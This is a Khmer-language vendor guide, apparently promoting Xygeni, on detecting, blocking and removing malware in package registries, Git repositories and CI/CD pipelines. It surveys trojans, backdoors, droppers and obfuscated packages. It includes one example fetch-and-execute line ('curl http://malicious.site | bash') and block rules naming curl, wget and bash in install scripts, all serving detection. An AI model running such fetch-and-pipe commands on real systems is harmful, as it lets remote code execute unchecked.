មេរោគមិនត្រឹមតែកំណត់គោលដៅចំណុចបញ្ចប់ទៀតទេ វាលាក់ខ្លួននៅក្នុងការពឹងផ្អែកប្រភពបើកចំហរបស់អ្នក CI/CD ការងារ និងសូម្បីតែស្គ្រីបក្រោយការដំឡើង។ អ្នកវាយប្រហារដឹងថាអ្នកអភិវឌ្ឍន៍ធ្វើចលនាលឿន ហើយពួកគេទាញយកអត្ថប្រយោជន៍ពីល្បឿននោះ។ ដូច្នេះប្រសិនបើអ្នកមិនត្រូវបានរៀបចំដើម្បីរកឃើញមេរោគតាំងពីដំបូងទេ អ្នកកំពុងប្រឈមនឹងហានិភ័យរួចទៅហើយ។ នោះហើយជាមូលហេតុដែលការយល់ដឹង របៀបពិនិត្យមើលមេរោគ, របៀបកម្ចាត់មេរោគនិងដឹងច្បាស់ពីការពិត ឧទាហរណ៍នៃមេរោគ វាមិនត្រឹមតែមានប្រយោជន៍ទេ វាចាំបាច់ណាស់។
នៅក្នុងការណែនាំនេះ យើងនឹងពន្យល់ពីរបៀបសម្គាល់ការគំរាមកំហែងតាំងពីដំបូង បញ្ឈប់ពួកវាមុនពេលពួកវាដំណើរការ និងលុបពួកវាចេញពីមូលដ្ឋានកូដរបស់អ្នក និង pipelineជារៀងរហូត។ លើសពីនេះ យើងនឹងពន្យល់ពីរបៀបការពារមេរោគដោយមិនធ្វើឱ្យការដឹកជញ្ជូនយឺត។
របៀបពិនិត្យមើលមេរោគមុនពេលវាប៉ះពាល់ដល់ផលិតកម្ម
របៀបពិនិត្យមើលមេរោគ មិនមែនគ្រាន់តែជាបញ្ជីត្រួតពិនិត្យសុវត្ថិភាពនោះទេ។ វាគឺជាយុទ្ធសាស្ត្របន្តមួយដែលចាប់ផ្តើមតាំងពីដំបូង ហើយដំណើរការពាសពេញផ្ទៃរបស់អ្នកទាំងមូល pipelineជាធម្មតា មេរោគចូលដោយស្ងាត់ៗតាមរយៈ ភាពអាស្រ័យអន្តរកាល, ស្គ្រីបក្រោយការដំឡើងដែលត្រូវបានមើលរំលង ឬជំហានសាងសង់ដែលត្រូវបានកំណត់រចនាសម្ព័ន្ធមិនត្រឹមត្រូវ។ ដើម្បីរារាំងវាប្រកបដោយប្រសិទ្ធភាព អ្នកត្រូវការ ភាពមើលឃើញ នៅស្រទាប់នីមួយៗ៖ ប្រភព, ភាពអាស្រ័យ និងឥរិយាបថពេលដំណើរការ។ នេះជារបៀបពិនិត្យមើលមេរោគដំបូង ជាបន្តបន្ទាប់ និងដោយស្វ័យប្រវត្តិដោយប្រើ Xygeni។
១. ស្កេនបញ្ជីឈ្មោះមុនពេលអ្នកដំឡើងអ្វីមួយ
មេរោគភាគច្រើនសព្វថ្ងៃនេះចាប់ផ្តើមជាមួយ ភាពអាស្រ័យតាមពិតទៅ អ្នកវាយប្រហារច្រើនតែបង្ហោះកញ្ចប់ព្យាបាទក្រោមឈ្មោះដែលស្រដៀងនឹងបណ្ណាល័យពេញនិយម។ ទាំងនេះច្រើនតែមើលទៅគ្មានគ្រោះថ្នាក់នៅក្នុង package.json or requirements.txt, រហូតដល់ពួកគេអនុវត្ត។
ស៊ីហ្គេនី ប្រព័ន្ធព្រមានជាមុន តាមដានជាបន្តបន្ទាប់នូវបញ្ជីឈ្មោះដូចជា npm, PyPI, Maven និង Docker Hub។ វាវិភាគកំណែកញ្ចប់ថ្មីនីមួយៗនៅពេលដែលវាត្រូវបានបោះពុម្ពផ្សាយ។ យើងស្វែងរក៖
- ស្គ្រីបដំឡើងគួរឱ្យសង្ស័យ (
setup.py,postinstall,install.sh) - កូដដែលបានបិទបាំង (ប្លុក base64 ខ្សែអក្សរដែលបានអ៊ិនកូដ ការប្រើប្រាស់វាយតម្លៃ)
- ការហៅទូរស័ព្ទបណ្តាញដែលមិននឹកស្មានដល់អំឡុងពេលដំឡើង
- ទីប៉ូស្ក្វាត លំនាំដាក់ឈ្មោះ
លើសពីនេះ ប្រសិនបើអ្នកដំណើរការ yarn install, npm iឬ pip installហើយកញ្ចប់មួយក្នុងចំណោមកញ្ចប់ត្រូវបានដាក់ទង់ Xygeni រារាំងវាដោយស្វ័យប្រវត្តិ ប្រសិនបើអ្នកកំពុងប្រើ Guardrails ឬការរួមបញ្ចូលគ្នា CI។
✅ គន្លឹះសម្រាប់អ្នកអភិវឌ្ឍន៍៖ ប្រសិនបើអ្នកកំពុងរៀន របៀបពិនិត្យមើលមេរោគ ក្នុងពេលវេលាជាក់ស្តែង អ្នកអាចពិនិត្យមើលកញ្ចប់ដែលបានដាក់ទង់ដោយផ្ទាល់នៅក្នុង dashboard ឬរៀបចំការជូនដំណឹងទៅកាន់ Slack ឬ Teams តាមរយៈ webhook នៅពេលដែលមានការពឹងផ្អែកនៅក្នុងរបស់អ្នក SBOM បង្ហាញឥរិយាបថមេរោគដែលគេស្គាល់ ឬគួរឱ្យសង្ស័យ។
2. ស្កេនកូដនៅក្នុង Git Repos មុនពេលវាត្រូវបានបញ្ចូលគ្នា
របៀបពិនិត្យមើលមេរោគ លើសពីការស្កេនកញ្ចប់។ មេរោគមួយចំនួនមិនមកពីការពឹងផ្អែករបស់ភាគីទីបីទេ។ ផ្ទុយទៅវិញ វាគឺជា commitបានបញ្ចូលដោយផ្ទាល់ទៅក្នុងកូដប្រភព។ នេះរួមបញ្ចូលទាំងអាថ៌កំបាំងដែលបានអ៊ិនកូដយ៉ាងរឹងមាំ ស្គ្រីបគួរឱ្យសង្ស័យ ឬអត្ថបទខ្លីៗដែលបានចម្លងពីឧបករណ៍ AI ឬវេទិកាដូចជា StackOverflow។ ដើម្បីចាប់ហានិភ័យទាំងនេះមុនពេលវារីករាលដាល Xygeni ស្កេនរាល់ commit និង pull request សម្រាប់តក្កវិជ្ជាដែលលាក់កំបាំង លំនាំមិនមានសុវត្ថិភាព និងកូដព្យាបាទ។
ជាមួយ ស៊ីហ្គេនី ការរួមបញ្ចូល GitHubរាល់ការរុញ ឬ pull request អាចបង្ក៖
- SAST ស្កេនសម្រាប់បន្ទុកដែលបានអ៊ិនកូដ ឬបិទបាំង
- ការរកឃើញសម្ងាត់ជាមួយនឹងការផ្ទៀងផ្ទាត់ និងការលុបចោល
- ការវិភាគលទ្ធភាពទៅដល់ ដើម្បីពិនិត្យមើលថាតើកូដគួរឱ្យសង្ស័យពិតជាអាចប្រតិបត្តិបានឬអត់
- ការរកឃើញភាពមិនប្រក្រតីដើម្បីសម្គាល់ការក្លែងបន្លំនៅក្នុងឯកសារហេដ្ឋារចនាសម្ព័ន្ធ ស្គ្រីបសែល និងការកំណត់រចនាសម្ព័ន្ធ CI
អ្នកអាចដោត Xygeni ទៅក្នុង GitHub Actions ឬ GitLab CI ដើម្បីស្កេន PR ដោយស្វ័យប្រវត្តិ។ តាមវិធីនេះ ប្រសិនបើនរណាម្នាក់រុញស្គ្រីបដែលលួចចូល ឬ Dockerfileការស្កេនដំណើរការភ្លាមៗ ហើយរារាំងការបញ្ចូលគ្នាប្រសិនបើវារំលោភលើ Guardrails.
✅ ករណីការប្រើប្រាស់: ប្រសិនបើ PR ណែនាំ curl http://malicious.site | bash, Xygeni នឹងដាក់ទង់ជាតិ ហើយបំបែកការប៉ុនប៉ងបញ្ចូលគ្នានៅលើ build មុនពេលវាប៉ះ main។
៣. អនុវត្តការស្កេនមេរោគនៅក្នុង CI/CD Pipelines
ទោះបីជាអ្នកខកខានអ្វីមួយមុននេះក៏ដោយ CI គឺជាឱកាសចុងក្រោយរបស់អ្នកដើម្បីបញ្ឈប់មេរោគមុនពេលដាក់ពង្រាយ។ Xygeni រួមបញ្ចូលទៅក្នុងឧបករណ៍ CI សំខាន់ៗទាំងអស់៖ GitHub Actions, GitLab, Jenkins, Bitbucket, Azure DevOps.
នៅពេលបន្ថែមរួច Xygeni នឹងស្កេនការងារនីមួយៗសម្រាប់៖
- មិនគួរឱ្យទុកចិត្ត ការទាញយក or ការទាញយកបន្ទុក
- គ្រោះថ្នាក់ ពាក្យបញ្ជាសែល or តក្កវិជ្ជាមិនច្បាស់លាស់ នៅក្នុងស្គ្រីប
- គោលពីរ ឬ ការក្លែងបន្លំវត្ថុបុរាណ (ឧ. ឯកសារដែលមិនទាន់ចុះហត្ថលេខា ឬហាសដែលមិនត្រូវគ្នា SBOM)
- ការហៅទូរសព្ទតាមបណ្តាញ អំឡុងពេលសាងសង់ ឬជំហានសាកល្បង
អ្នកអាចដំឡើងម៉ាស៊ីនស្កេនដោយប្រើពាក្យបញ្ជា CLI សាមញ្ញ ឬកុងតឺន័រ Docker ហើយកំណត់រចនាសម្ព័ន្ធវាឱ្យដំណើរការនៅដំណាក់កាលបង្កើត សាកល្បង ឬដាក់ពង្រាយ។
# GitHub Actions example
- name: Scan for malware
uses: xygeni/xygeni-action@v1
env:
XYGENI_API_KEY: ${{ secrets.XYGENI_API_KEY }}
លើសពីនេះ អ្នកអាចបំបែក builds ដោយស្វ័យប្រវត្តិ ប្រសិនបើមេរោគត្រូវបានរកឃើញ៖
fail_on: malware
block_on: postinstall + base64 + external_url
✅ ចុងគាំទ្រ: បន្ថែម --xygeni-check ទៅកាន់ការសាងសង់ជាមុនរបស់អ្នក hooks នៅក្នុង CI ដូច្នេះអ្នកអាចបញ្ឈប់ការដំឡើងមិនល្អមុនពេលកុងតឺន័រ ឬប្រព័ន្ធគោលពីរត្រូវបានផលិត។
4 ។ ប្រើ Guardrails ដើម្បីទប់ស្កាត់មេរោគដែលស្គាល់ និងមិនស្គាល់
របៀបពិនិត្យមើលមេរោគប្រកបដោយប្រសិទ្ធភាពនៅក្នុងបរិយាកាសផលិតកម្មតម្រូវឱ្យមានច្រើនជាងការស្កេនជាមូលដ្ឋាន។ សម្រាប់ការអនុវត្តកម្រិតផលិតកម្ម Xygeni ផ្តល់ជូន ផ្ទាល់ខ្លួន Guardrails ដែលអនុញ្ញាតឱ្យអ្នកកំណត់ជាមុនcisគោលការណ៍សម្រាប់ការទប់ស្កាត់ការបង្កើតដោយផ្អែកលើឥរិយាបថ កម្រិតហានិភ័យ ឬប្រភេទឯកសារ។
អ្នកអាចកំណត់ច្បាប់ដូចជា៖
- រារាំងកញ្ចប់ណាមួយជាមួយ
postinstallការហៅស្គ្រីបwget,curl,bash,python - បំបែកការបង្កើតប្រសិនបើកូដរួមបញ្ចូល
eval()ឬនាំចូលថាមវន្តពីអថេរ - ដាក់ទង់ commits ដែលកែប្រែ
.github/workflows/*លុះត្រាតែបានផ្ទៀងផ្ទាត់
ស៊ីហ្គេនី Guardrails ធ្វើការទាំងនៅក្នុង Git (កំឡុងពេលបញ្ចូលគ្នា) និងនៅក្នុង CI/CD (កំឡុងពេលសាងសង់)។ ប្រសិនបើច្បាប់ណាមួយត្រូវបានរំលោភបំពាន ការសាងសង់ ឬការបញ្ចូលគ្នានឹងត្រូវបានរារាំងដោយស្វ័យប្រវត្តិ ហើយអ្នកអភិវឌ្ឍន៍ទទួលបានហេតុផលច្បាស់លាស់។
✅ ចលនាកម្រិតខ្ពស់៖ បង្កើត Guardrails ដែលអនុវត្តចំពោះតែផ្លូវដែលមានភាពរសើបខ្ពស់ដូចជា infra/, scripts/ឬ build/និងតម្រូវឱ្យមានការយល់ព្រមសម្រាប់ការជំនួស។
គន្លឹះចុងក្រោយ៖ ស្កេន SBOMសម្រាប់ហានិភ័យនៃមេរោគ
Xygeni ក៏ស្កេនរបស់អ្នកផងដែរ សេចក្តីព្រាងសម្ភារៈកម្មវិធី (SBOM) ដើម្បីតាមដានយ៉ាងពិតប្រាកដនូវអ្វីដែលបានចូលទៅក្នុងការបង្កើតរបស់អ្នក និងពិនិត្យមើលសមាសធាតុនីមួយៗសម្រាប់ឥរិយាបថមេរោគ ហានិភ័យអាជ្ញាប័ណ្ណ និងពិន្ទុសុវត្ថិភាព។
អ្នកអាចបង្កើត SBOMs ជាមួយ ព្យុះស៊ីក្លូនDX, SPDX ឬ Syft ហើយផ្ទុកឡើងពួកវាទៅ Xygeni សម្រាប់ការត្រួតពិនិត្យជាបន្តបន្ទាប់។
SBOM ការស្កេនជួយអ្នក៖
- រកឃើញការសម្របសម្រួលខ្សែសង្វាក់ផ្គត់ផ្គង់
- ធានាបាននូវការសាងសង់ដែលអាចផលិតឡើងវិញបាន
- ឆ្លងកាត់ការត្រួតពិនិត្យបទប្បញ្ញត្តិ (ឧ. ច្បាប់ស្តីពីភាពធន់នៃអ៊ីនធឺណិតរបស់សហភាពអឺរ៉ុប បទបញ្ជាប្រតិបត្តិលេខ 14028 របស់សហរដ្ឋអាមេរិក)
ស្វែងយល់ពីឧបករណ៍កំពូលៗសម្រាប់ចាប់មេរោគបានទាន់ពេលវេលា
សូមពិនិត្យមើលមគ្គុទ្ទេសក៍របស់យើងអំពីឧបករណ៍រកឃើញមេរោគល្អបំផុតសម្រាប់ឆ្នាំ ២០២៥
ឧទាហរណ៍នៃមេរោគដែលវាយប្រហារពិតប្រាកដ Pipelines (តាមប្រភេទ)
ដើម្បីយល់យ៉ាងពិតប្រាកដ របៀបពិនិត្យមើលមេរោគ, វាជួយក្នុងការសិក្សា ឧទាហរណ៍នៃមេរោគ ដែលប៉ះចំពិតប្រាកដ pipelineខាងក្រោមនេះ យើងបានដាក់ជាក្រុមការគំរាមកំហែងតាមប្រភេទ និងពន្យល់ពីរបៀបដែលការគំរាមកំហែងនីមួយៗដំណើរការ និងរបៀបដែល Xygeni ជួយរារាំងពួកវា។
ផែ្នក។
ផែ្នក។ ធ្វើពុតជាកញ្ចប់ដែលមានប្រយោជន៍។ នៅពេលដំឡើងរួច ពួកវាប្រតិបត្តិកូដព្យាបាទនៅផ្ទៃខាងក្រោយ។ ឧទាហរណ៍ កញ្ចប់ npm discordyt និង distube-config មើលទៅដូចជាម៉ូឌុល Discord ស្របច្បាប់។ តាមពិតទៅ ពួកគេបានទម្លាក់មេរោគ Trojan ដែលលួចយកព័ត៌មានសម្ងាត់ វគ្គកម្មវិធីរុករក និងទិន្នន័យប្រព័ន្ធ។ លុះត្រាតែអ្នកអនុវត្តការភ្ជាប់កំណែ ឬផ្ទៀងផ្ទាត់ហត្ថលេខា មេរោគ Trojan ដូចជាទាំងនេះអាចលួចចូលដោយមិនមាននរណាកត់សម្គាល់។
ខាងក្រោយផ្ទះ
ខាងក្រោយផ្ទះ បង្កើតចំណុចចូលប្រើដែលលាក់សម្រាប់អ្នកវាយប្រហារ។ ឧទាហរណ៍មេរោគដ៏ធ្ងន់ធ្ងរបំផុតមួយគឺ CVE-2024-3094, ដែលជាកន្លែងដែល liblzma បណ្ណាល័យបង្ហាប់ត្រូវបានលួចចូលពីក្រោយដើម្បីរំលងការផ្ទៀងផ្ទាត់ SSH។ តាមពិតទៅ ប្រព័ន្ធគោលពីរដែលបានផ្លាស់ប្តូរបានធ្វើឱ្យវាក្លាយជាការចេញផ្សាយច្រើន។ ជាសំណាងល្អ ជាមួយនឹងការរកឃើញភាពមិនប្រក្រតីដូចជាការស្កេនសុចរិតភាពឯកសាររបស់ Xygeni អ្នកនឹងចាប់បានការផ្លាស់ប្តូរនេះតាំងពីដំបូង យូរមុនពេលដាក់ពង្រាយ។
អ្នកលួចរូបិយប័ណ្ណឌីជីថល
ឧទាហរណ៍មួយទៀតនៃមេរោគគឺ Crypto-stealers។ អ្នកលួចរូបិយប័ណ្ណឌីជីថល លួចយកអាថ៌កំបាំងដូចជាខូឃីស៍ ថូខឹនវគ្គ និងកូនសោកាបូប។ មេរោគមួយហៅថា bladeroid បានធ្វើដូច្នោះមែន។ វាត្រូវបានបង្កប់នៅក្នុងកញ្ចប់ npm ហើយបានផ្ទុកឡើងទិន្នន័យដែលត្រូវបានគេលួចទៅកាន់ចំណុចបញ្ចប់ដែលគ្រប់គ្រងដោយអ្នកវាយប្រហារដោយស្ងាត់ៗ។ ប្រព័ន្ធព្រមានមុនរបស់ Xygeni បានចាប់វាបានមុនពេលអ្នកអភិវឌ្ឍន៍ទាញយកវាទៅទៀត។
ដំណក់ទឹក
ដំណក់ទឹក គឺជាកម្មវិធីផ្ទុកតូចៗដែលទាញយកមេរោគកម្រិតខ្ពស់ជាងមុននៅពេលដែលពួកវាដំណើរការ។ ឧទាហរណ៍ កញ្ចប់ PyPI ថ្មីៗជាច្រើនត្រូវបានប្រើប្រាស់ setup.py ដើម្បីបង្កឲ្យមានការទាញយកសែលពីចម្ងាយបន្ទាប់ពីការដំឡើង។ ប្រសិនបើអ្នក pipeline មិនត្រួតពិនិត្យឥរិយាបថដំឡើងទេ ទាំងនេះអាចដំណើរការដោយស្ងៀមស្ងាត់។ Xygeni វិភាគការដំឡើង hooks, សម្គាល់ការហៅទូរស័ព្ទតាមបណ្តាញ ហើយបញ្ឈប់ដំណក់ទឹកមុនពេលវារាលដាល។
មេរោគដែលលាក់បាំង
មេរោគដែលលាក់បាំង លាក់ចេតនាដោយប្រើល្បិចដូចជាការបំបែកខ្សែអក្សរ ឬ base64។ កញ្ចប់ក្លែងក្លាយមួយចំនួនថែមទាំងក្លែងបន្លំជាបណ្ណាល័យសុវត្ថិភាពទៀតផង។ ពួកគេបានពន្យារពេលការរកឃើញដោយលាក់តក្កវិជ្ជានៅក្នុងការនាំចូលថាមវន្ត។ យ៉ាងណាក៏ដោយ Xygeni-SAST បំបាត់ភាពមិនច្បាស់លាស់ និងវិភាគតក្កវិជ្ជា ដើម្បីបង្ហាញបន្ទុកដែលបានបង្កប់ សូម្បីតែនៅទូទាំងឯកសារច្រើន។ ការវាយប្រហារដែលមានមូលដ្ឋានលើការបិទបាំងទាំងនេះ គឺជាការវាយប្រហារដ៏លំបាកបំផុតមួយចំនួន។ ឧទាហរណ៍នៃមេរោគ ដើម្បីចាប់ដោយគ្មានការវិភាគឋិតិវន្ត។
សរុបមក ឧទាហរណ៍មេរោគទាំងនេះបង្ហាញថាគ្មានផ្នែកណាមួយនៃ pipeline គឺមិនអនុញ្ញាតឲ្យចូលប្រើប្រាស់ទេ។ ដើម្បីធានាសុវត្ថិភាពដំណើរការការងារយ៉ាងពិតប្រាកដ អ្នកអភិវឌ្ឍន៍ត្រូវតែយល់ពីរបៀបកម្ចាត់មេរោគយ៉ាងឆាប់រហ័ស និងផ្ទៀងផ្ទាត់អ្វីៗគ្រប់យ៉ាង ជាពិសេសអ្វីដែលដំបូងឡើយហាក់ដូចជាមានសុវត្ថិភាព។
របៀបកម្ចាត់មេរោគ Malware នៅពេលដែលវាត្រូវបានរកឃើញ
ទោះបីជាមានការរកឃើញដ៏រឹងមាំក៏ដោយ មេរោគនៅតែអាចលួចចូលបាន។ ប្រហែលជាវាជាដំណក់ទឹកសូន្យថ្ងៃ។ ប្រហែលជាអ្នករួមចំណែកដោយមិនដឹងខ្លួនបានជំរុញការពឹងផ្អែកដែលឆ្លងមេរោគ។ ទោះជាយ៉ាងណាក៏ដោយ ការដឹងពីរបៀបកម្ចាត់មេរោគបានយ៉ាងឆាប់រហ័ស និងសុវត្ថិភាពគឺមានសារៈសំខាន់ណាស់។ នេះជារបៀបដែល Xygeni ជួយអ្នកលុបបំបាត់ការគំរាមកំហែងនៅពេលដែលពួកវាលេចឡើង ដោយប្រើ pre...cisអ៊ីយ៉ុង និងស្វ័យប្រវត្តិកម្ម។
១. ដាក់ការគំរាមកំហែងឱ្យនៅដាច់ដោយឡែកភ្លាមៗ៖ គ្មានការពិនិត្យឡើងវិញដោយដៃទេ
នៅពេលដែលអ្នករកឃើញមេរោគ សូមទប់ស្កាត់វានៅនឹងកន្លែង។ នេះជាកន្លែងដែលការដឹងពីរបៀបកម្ចាត់មេរោគប្រកបដោយប្រសិទ្ធភាពចាប់ផ្តើម។ ប្រព័ន្ធព្រមានដំបូងរបស់ Xygeni វាធ្វើសកម្មភាពភ្លាមៗ។ វាដាក់កញ្ចប់ដែលមានគំនិតអាក្រក់ឱ្យនៅដាច់ដោយឡែកនៅពេលដែលវាសម្គាល់ពួកវា។
វាលុបកញ្ចប់ទាំងនោះចេញពីបរិបទសាងសង់ទាំងអស់ រារាំងការដំឡើងនាពេលអនាគត និងអនុវត្តបញ្ជីខ្មៅទាំងនៅកម្រិតចុះបញ្ជី និងកម្រិតគម្រោង។
ប្រសិនបើអ្នកប្រើបញ្ជីឈ្មោះកញ្ចប់ឯកជន Xygeni នឹងពង្រីកការដាក់ឱ្យនៅដាច់ដោយឡែកនៅទូទាំងអង្គការរបស់អ្នកទាំងមូល។ សរុបមក នៅពេលដែល Xygeni សម្គាល់កញ្ចប់មួយថាជាមេរោគ គ្មានក្រុមណាមួយអាចប្រើវាឡើងវិញនៅកន្លែងណាបានទេ។
✅ ចុងគាំទ្រ: បើកការជូនដំណឹងតាមពេលវេលាជាក់ស្តែង ដើម្បីជំរុញការជូនដំណឹងរបស់ Slack ឬ Jira ទៅកាន់ក្រុមរបស់អ្នក នៅពេលដែល Xygeni អនុវត្តការដាក់ឱ្យនៅដាច់ដោយឡែក។
2. បំបែកការសាងសង់ដោយស្វ័យប្រវត្តិជាមួយ Guardrails
ការបញ្ឈប់មេរោគមិនមែនគ្រាន់តែជាការជូនដំណឹងនោះទេ វាគឺអំពី ការអនុវត្តដោយស្វ័យប្រវត្តិនោះហើយជាកន្លែងដែល Xygeni Guardrails ចូលមក។ អ្នកអាចកំណត់ជាមុនcisគោលនយោបាយដូចជា៖
fail_on: malware
block_if: postinstall + base64 + external_url
ច្បាប់ទាំងនេះអនុញ្ញាតឱ្យអ្នកបរាជ័យក្នុងការសាងសង់ភ្លាមៗប្រសិនបើ៖
- ការពឹងផ្អែកមួយបង្កឱ្យមានសូចនាករអាកប្បកិរិយា
- កូដរួមបញ្ចូលតក្កវិជ្ជាមិនច្បាស់លាស់
- អាថ៌កំបាំងត្រូវបានរកឃើញនៅក្នុង commit ប្រវត្តិសាស្រ្ត
- ប្រព័ន្ធគោលពីរ ឬស្គ្រីបដែលមិនស្គាល់បញ្ចូល pipeline
អ្នកអាចកំណត់វិសាលភាព Guardrails តាមរយៈ repo, branch, severity, ឬ file path ដែលផ្តល់ឱ្យអ្នកនូវការគ្រប់គ្រងដ៏ល្អិតល្អន់។ អ្វីដែលសំខាន់បំផុតនោះគឺ អ្នកអភិវឌ្ឍន៍ទទួលបានមតិកែលម្អច្បាស់លាស់ និងបរិបទដោយផ្ទាល់នៅក្នុងកំណត់ហេតុ CI ឬមតិយោបល់ PR របស់ពួកគេ។
Guardrails មិនមែនគ្រាន់តែជាការរកឃើញនោះទេ ពួកវាជាការការពារដោយស្វ័យប្រវត្តិដែលមានមាត្រដ្ឋាន។
៣. លុបចោលអាថ៌កំបាំងដែលលេចធ្លាយក្នុងពេលវេលាជាក់ស្តែង
យុទ្ធនាការមេរោគជាច្រើនមានគោលបំណងទាញយកអាថ៌កំបាំង៖ លិខិតសម្គាល់លើពពក, ថូខឹន API, GitHub OAuths។ ប្រសិនបើអ្នករកឃើញមេរោគ អ្នកត្រូវតែសន្មតថាមានអ្វីមួយត្រូវបានលាតត្រដាង។
សន្តិសុខសម្ងាត់របស់ Xygeni ម៉ូឌុល៖
- ស្កេនប្រវត្តិ Git សម្រាប់អាថ៌កំបាំងដែលត្រូវបានណែនាំដោយដៃ ឬដោយមេរោគ
- ផ្ទៀងផ្ទាត់ថាតើអាថ៌កំបាំងនៅតែសកម្មឬអត់
- ដកហូត និងបង្វិលពួកវាដោយស្វ័យប្រវត្តិដោយប្រើការរួមបញ្ចូលដែលភ្ជាប់មកជាមួយ
អ្នកទទួលបានសេចក្តីសង្ខេបពេញលេញដែលបង្ហាញ៖
- តើអាថ៌កំបាំងអ្វីខ្លះដែលត្រូវបានលាតត្រដាង
- កន្លែងដែលពួកគេរស់នៅក្នុងលេខកូដ
- តើជំហានដោះស្រាយអ្វីខ្លះដែលត្រូវបានអនុវត្ត (លុបចោល បង្វិល ជំនួស)
គ្មានសៀវភៅបញ្ជី។ គ្មានការទស្សន៍ទាយ។ គ្មានការពន្លត់អគ្គីភ័យ។
៤. ជួសជុលដោយស្វ័យប្រវត្តិនូវការពឹងផ្អែកដែលមានគំនិតអាក្រក់ ស្អាត និងមានសុវត្ថិភាព
ប្រសិនបើមេរោគបានមកដល់តាមរយៈកញ្ចប់ដែលរងការគំរាមកំហែង ឬងាយរងគ្រោះ ជំហានបន្ទាប់របស់អ្នកគឺការជួសជុលឡើងវិញ។ ការជួសជុលដោយស្វ័យប្រវត្តិរបស់ Xygeni ម៉ាស៊ីនជួយអ្នកដោះស្រាយបញ្ហាបានយ៉ាងឆាប់រហ័ស ដោយមិនចាំបាច់បង្កើតហានិភ័យថ្មីឡើយ។
វាវិភាគថា៖
- កំណែណាខ្លះដែលស្អាត
- ថាតើការជួសជុលនេះណែនាំ CVE ថ្មីឬអត់
- ប្រសិនបើការផ្លាស់ប្តូរណាមួយដែលបង្កផលប៉ះពាល់ដល់ការសាងសង់របស់អ្នក
បន្ទាប់មកវាបង្កើតជាទម្រង់ដែលត្រៀមរួចជាស្រេចសម្រាប់បញ្ចូលគ្នា pull request, វិសាលភាពទៅតែសមាសធាតុដែលប៉ះពាល់ប៉ុណ្ណោះ។
xygeni autofix --target package.json --apply
អ្នកទទួលបានការអាប់ដេតស្អាតដោយគ្មានការស្មានទុកជាមុន មានតែការអាប់ដេតដែលមានសុវត្ថិភាព និងមានការផ្ទៀងផ្ទាត់ប៉ុណ្ណោះ។
៥. តាមដានឧប្បត្តិហេតុពី Commit ទៅកាន់វត្ថុបុរាណ
ជាចុងក្រោយ ការដឹងពីរបៀបកម្ចាត់មេរោគក៏មានន័យថា ការយល់ដឹងអំពីអ្វីដែលបានកើតឡើង និងអាចបញ្ជាក់វាបាន។ Xygeni ផ្តល់នូវការបញ្ជាក់ឧប្បត្តិហេតុពេញលេញ និងការតាមដានតាមរយៈទិន្នន័យបញ្ជាក់។
ចំពោះព្រឹត្តិការណ៍មេរោគណាមួយ អ្នកអាចតាមដាន៖
- ចំពោះ Git commit ឬ ទំនាក់ទំនងសាធារណៈ ដែលបានណែនាំសមាសធាតុ
- ចំពោះ CI/CD ជំហាន វាបានឆ្លងកាត់
- ចំពោះ រូបភាព ឬវត្ថុបុរាណ វាបានចុះចតនៅ
- មិនថា វាជា បានចុះហត្ថលេខា ស្កេន និងផ្ទៀងផ្ទាត់
នេះផ្តល់ឱ្យអ្នកទាំងពីរ ភាពមើលឃើញនៃមូលហេតុដើម និង ភស្តុតាងកោសល្យវិច្ច័យចាំបាច់សម្រាប់ការត្រួតពិនិត្យផ្ទៃក្នុង របាយការណ៍អនុលោមភាព ឬការឆ្លើយតបនឹងឧប្បត្តិហេតុ។
ត្រាពេលវេលា Xygeni ធានាសុវត្ថិភាព និងធ្វើឱ្យផ្លូវសវនកម្មទាំងអស់អាចនាំចេញបានពេញលេញ។
ជំហានទាំងនេះរួមគ្នាផ្តល់ឱ្យក្រុមរបស់អ្នកនូវផែនការឆ្លើយតបពេញលេញ និងស្វ័យប្រវត្តិ។ ចាប់ពីពេលដែលអ្នកដាក់ទង់ជាតិលើការគំរាមកំហែងរហូតដល់ចំណុចដែលអ្នកដោះស្រាយ និងតាមដានវា Xygeni បង្ហាញអ្នកពីរបៀបកម្ចាត់មេរោគនៅទូទាំងមូលដ្ឋានកូដរបស់អ្នក និង pipelineទ. អ្នកលែងមានប្រតិកម្មក្រោមសម្ពាធទៀតហើយ អ្នកឆ្លើយតបដោយការគ្រប់គ្រង ជាមុនcisអ៊ីយ៉ុង និងទំនុកចិត្តរាល់ពេល។
រកឃើញទាន់ពេលវេលា។ ធ្វើសកម្មភាពឲ្យបានរហ័ស។ ទប់ស្កាត់ឲ្យបានល្អ។
មេរោគមិនថយចុះទេ ហើយសុវត្ថិភាពរបស់អ្នកក៏មិនគួរថយចុះដែរ។ ដូចដែលអ្នកបានឃើញពេញមួយការបង្ហោះនេះ ការដឹង របៀបពិនិត្យមើលមេរោគ នៅក្នុងមូលដ្ឋានកូដរបស់អ្នក និង CI/CD លំហូរការងារគឺជាខ្សែការពារទីមួយ។ អ្វីដែលសំខាន់ដូចគ្នាដែរ អ្នកបានរៀន របៀបកម្ចាត់មេរោគ ដោយសុវត្ថិភាព និងរហ័ស នៅពេលដែលវាត្រូវបានរកឃើញ ដោយមិនចាំបាច់បំបែកការសាងសង់ ឬធ្វើឱ្យក្រុមរបស់អ្នកលើសលប់ឡើយ។
យើងក៏បានដើរឆ្លងកាត់ការពិតដែរ ឧទាហរណ៍នៃមេរោគ ដែលបង្ហាញយ៉ាងច្បាស់ពីរបៀបដែលពួកវាយប្រហារកេងប្រវ័ញ្ចឧបករណ៍អ្នកអភិវឌ្ឍន៍ ការចុះឈ្មោះប្រភពបើកចំហ និងស្គ្រីបស្វ័យប្រវត្តិកម្ម។
ជាមួយ Xygeni អ្នកអាច៖
- រកឃើញការគំរាមកំហែងនៅទូទាំងរបស់អ្នក pipelineស ក្នុងពេលវេលាជាក់ស្តែង
- អនុវត្ត Guardrails ការបែកបាក់នោះបង្កើតឡើងនៅលើឥរិយាបថព្យាបាទ
- លុបចោលអាថ៌កំបាំងដែលលេចធ្លាយដោយស្វ័យប្រវត្តិ
- ជួសជុលកញ្ចប់ដែលមានគំនិតអាក្រក់ ឬងាយរងគ្រោះជាមួយ AutoFix
- តាមដានរាល់ឧប្បត្តិហេតុពីកូដ commit ដល់ការផលិតវត្ថុបុរាណ
សរុបមក អ្នកប្តូរពីការសម្អាតដោយប្រតិកម្មទៅជាការបង្ការជាមុន។
